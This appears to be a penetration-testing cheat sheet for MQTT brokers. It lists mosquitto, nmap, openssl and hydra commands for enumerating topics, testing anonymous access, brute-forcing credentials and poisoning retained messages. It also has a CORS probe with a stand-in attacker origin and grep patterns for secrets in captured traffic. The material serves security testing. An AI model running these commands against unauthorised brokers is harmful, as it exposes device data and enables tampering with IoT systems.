Skip to main content

Want to Practice These Techniques?

Try Hackviser's interactive cyber security upskilling platform - Learn by doing!

Start Practicing Now

MQTT

Default Ports: 1883 (MQTT), 8883 (MQTT over TLS), 9001 (WebSocket)

MQTT is a lightweight publish/subscribe protocol used in IoT, telemetry, mobile apps, and microservices. In pentests, MQTT often exposes anonymous access, broad topic permissions, retained messages, and sensitive device or command traffic.

Connect

Using mosquitto_sub

mosquitto_sub validates read access to topics.

mosquitto_sub -h target.com -p 1883 -t 'test/topic'
mosquitto_sub -h target.com -p 1883 -t '#'
mosquitto_sub -h target.com -p 1883 -u username -P password -t '#'
mosquitto_sub -h target.com -p 1883 -v -t '#'

Using mosquitto_pub

mosquitto_pub validates write access with controlled messages.

mosquitto_pub -h target.com -p 1883 -t 'test/topic' -m 'hello'
mosquitto_pub -h target.com -p 1883 -u username -P password -t 'test/topic' -m 'hello'
mosquitto_pub -h target.com -p 1883 -t 'test/topic' -m 'retained-test' -r

Using TLS

TLS testing checks secure transport and certificate behavior.

mosquitto_sub -h target.com -p 8883 --capath /etc/ssl/certs -t '#'
mosquitto_sub -h target.com -p 8883 --insecure -t '#'
openssl s_client -connect target.com:8883 -showcerts

Using WebSocket MQTT

MQTT over WebSocket may be exposed by browser dashboards.

curl -i http://target.com:9001/mqtt
curl -i http://target.com:9001/ws

Recon

Service Detection with Nmap

Scan MQTT, TLS, WebSocket, and management ports.

nmap -p 1883,8883,9001 -sV target.com
nmap -p 8883 --script ssl-cert,ssl-enum-ciphers target.com
nmap -p 1883,8883 --open -sV 192.168.1.0/24

Broker Identification

Broker identity often comes from $SYS, TLS certificates, or management consoles.

openssl s_client -connect target.com:8883 -showcerts </dev/null
nmap -p 80,443,8080,8083,8084,18083,9001 -sV target.com
mosquitto_sub -h target.com -p 1883 -t '$SYS/#' -C 5 -W 5

Common Broker Ports

Scan vendor defaults when MQTT is suspected.

# Mosquitto: 1883, 8883
# EMQX: 1883, 8883, 8083, 8084, 18083
# HiveMQ: 1883, 8883, 8080
# VerneMQ: 1883, 8883, 8888

Enumeration

Anonymous Access

Anonymous subscribe or publish is the main MQTT finding.

mosquitto_sub -h target.com -p 1883 -t '$SYS/#' -v -W 10
mosquitto_sub -h target.com -p 1883 -t '#' -v -W 10
mosquitto_pub -h target.com -p 1883 -t 'pentest/check' -m 'anonymous-publish-test'

System Topics

$SYS topics may expose broker version, uptime, and client statistics.

mosquitto_sub -h target.com -p 1883 -t '$SYS/#' -v
mosquitto_sub -h target.com -p 1883 -u username -P password -t '$SYS/#' -v

Topic Discovery

MQTT has no standard topic listing, so wildcard subscriptions infer topic structure.

mosquitto_sub -h target.com -p 1883 -t '#' -v -W 30
mosquitto_sub -h target.com -p 1883 -t '+/+/+' -v -W 30

Retained Messages

Retained messages can expose the latest device state or commands.

mosquitto_sub -h target.com -p 1883 -t '#' -v --retained-only -W 10

ACL Enumeration

Compare topics across accounts to find overbroad permissions.

mosquitto_sub -h target.com -p 1883 -u device1 -P password -t '#' -v -W 10
mosquitto_pub -h target.com -p 1883 -u device1 -P password -t 'admin/command' -m 'test'

Attack Vectors

Anonymous Subscribe

Anonymous read access can expose telemetry and command topics.

mosquitto_sub -h target.com -p 1883 -t '#' -v

Anonymous Publish

Anonymous write access may alter device or application behavior.

mosquitto_pub -h target.com -p 1883 -t 'test/topic' -m 'pentest'

Wildcard Abuse

Broad wildcards can bypass weak topic design.

mosquitto_sub -h target.com -p 1883 -t '#' -v
mosquitto_sub -h target.com -p 1883 -t '+/command/#' -v

Weak Credentials

Device credentials are often reused or predictable.

hydra -L users.txt -P passwords.txt -s 1883 target.com mqtt
mosquitto_sub -h target.com -p 1883 -u username -P password -t '#'

Retained Message Poisoning

Retained publishes can leave persistent malicious or misleading values.

mosquitto_pub -h target.com -p 1883 -t 'test/topic' -m 'retained-pentest' -r
mosquitto_pub -h target.com -p 1883 -t 'test/topic' -n -r

WebSocket Exposure

Browser-accessible MQTT may expose tokens or weak CORS behavior.

curl -i -H 'Origin: https://attacker.example' http://target.com:9001/mqtt
rg -n 'mqtt|wss://|ws://|username|password|token' .

Post-Exploitation

Topic Mapping

Save observed topics and group them by device, tenant, or command path.

mosquitto_sub -h target.com -p 1883 -t '#' -v -W 60 > mqtt-topics.txt
cut -d' ' -f1 mqtt-topics.txt | sort -u

Sensitive Data Review

Search captured messages for secrets and identifiers.

grep -Ei 'password|secret|token|apikey|authorization|session|credential' mqtt-topics.txt
grep -Ei 'command|admin|config|ota|firmware|debug' mqtt-topics.txt

Logging Check

Generate controlled auth failures and publish attempts.

mosquitto_sub -h target.com -p 1883 -u invalid -P invalid -t '#' -W 3
mosquitto_pub -h target.com -p 1883 -t 'pentest/log-check' -m 'test'

Useful Tools

ToolPurpose
mosquitto_subSubscribe and enumerate topics
mosquitto_pubPublish test messages
nmapPort scanning
opensslTLS review
hydraCredential testing
tcpdumpTraffic capture
MQTT ExplorerGUI topic browsing

Security Misconfigurations

MisconfigurationRisk
Anonymous subscribeData exposure
Anonymous publishCommand injection or data tampering
Broad wildcard ACLsCross-tenant or cross-device access
Retained sensitive messagesPersistent data leakage
Weak device credentialsBroker compromise
Plaintext MQTTCredential and message capture
WebSocket MQTT exposedBrowser-based abuse